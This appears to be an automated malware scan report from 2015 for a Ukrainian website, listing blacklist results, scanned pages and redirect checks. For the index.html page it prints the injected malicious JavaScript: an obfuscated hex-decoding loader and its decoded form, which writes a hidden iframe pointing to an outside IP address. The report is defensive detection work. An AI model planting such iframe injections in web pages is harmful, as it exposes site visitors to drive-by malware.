Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=exprocad.com.ua
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://exprocad.com.ua/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.exprocad.com.ua/ | HTTP/1.1 302 Found Connection: close Date: Fri, 09 Jan 2015 08:53:38 GMT Location: http://exprocad.com.ua/mdesign/index.html Server: nginx/1.2.2 Content-Type: text/html; charset=iso-8859-1 | clean |
http://exprocad.com.ua/mdesign/index.html | 200 OK Content-Length: 18967 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function c1200847515n490fc91d084e7(n490fc91d08ccb){ function n490fc91d094b0(){return 16;} return (parseInt(n490fc91d08ccb,n490fc91d094b0()));}function n490fc91d0a479(n490fc91d0ac5d){ var n490fc91d0c437=2; var n490fc91d0b457='';n490fc91d0d412=String.fromCharCode;for(n490fc91d0bc3d=0;n490fc91d0bc3d<n490fc91d0ac5d.length;n490fc91d0bc3d+=n490fc91d0c437){ n490fc91d0b457+=(n490fc91d0d412(c1200847515n490fc91d084e7(n490fc91d0ac5d.substr(n490fc91d0bc3d,n490fc91d0c437))));}return n490fc91d0b457;} var x Decoded script: function check_content(){var i=0;while(document.getElementsByTagName('iframe').length){var el=document.getElementsByTagName('iframe')[i];if( (el.style.display=='none' || el.style.visibility =='hidden' || (el.width<5 && el.height<5)) && el.name!='c1'){el.parentNode.removeChild(el);}else i++;}}check_content(); if(!myia){document.write(unescape( '%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%63%31%20%73%72%63%3d%27%68%74%74%70%3a%2f%2f%37%39%2e%31%33%32%2e%32%31%31%2e%33%30%2f%68%65%69%2f%3f%74%3d%32%34%27%20%77%69%64%74%68%3d%34%30%31%20%68%65%69%67%68%74%3d%34%33%32%20%73%74%79%6c%65%3d%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%27%3e%3c%2f%69%66%72%61%6d%65%3e'));}var myia=true; Antivirus reports:
| ||
http://exprocad.com.ua/mdesign/company.php | 200 OK Content-Length: 12584 Content-Type: text/html | clean |
http://exprocad.com.ua/mdesign/www.zcs.ch | 404 Not Found Content-Length: 11473 Content-Type: text/html | clean |
http://exprocad.com.ua/__errorpages__/script.js | 200 OK Content-Length: 210 Content-Type: application/x-javascript | clean |
http://exprocad.com.ua/mdesign/index | 404 Not Found Content-Length: 11473 Content-Type: text/html | clean |
http://exprocad.com.ua/test404page.js | 404 Not Found Content-Length: 11473 Content-Type: text/html | clean |
http://exprocad.com.ua/index | 404 Not Found Content-Length: 11473 Content-Type: text/html | clean |
http://exprocad.com.ua/mdesign/www.mountair.com | 404 Not Found Content-Length: 11473 Content-Type: text/html | clean |
http://exprocad.com.ua/mdesign/index.php | 404 Not Found Content-Length: 11473 Content-Type: text/html | clean |
http://exprocad.com.ua/mdesign/products.php | 200 OK Content-Length: 13108 Content-Type: text/html | clean |
http://exprocad.com.ua/mdesign/dspsol.php | 200 OK Content-Length: 15189 Content-Type: text/html | clean |
http://exprocad.com.ua/mdesign/dsp_demo1.php | 200 OK Content-Length: 7869 Content-Type: text/html | clean |
http://exprocad.com.ua/mdesign/download.php | 200 OK Content-Length: 9798 Content-Type: text/html | clean |
http://exprocad.com.ua/mdesign/contacts.php | 200 OK Content-Length: 11024 Content-Type: text/html | clean |
http://exprocad.com.ua/mdesign/links.php | 200 OK Content-Length: 8564 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: exprocad.com.ua
Result:
GET / HTTP/1.1
Host: exprocad.com.ua
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: exprocad.com.ua
Referer: http://www.google.com/search?q=exprocad.com.ua
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: exprocad.com.ua
Referer: http://www.google.com/search?q=exprocad.com.ua
Result:
The result is similar to the first query. There are no suspicious redirects found.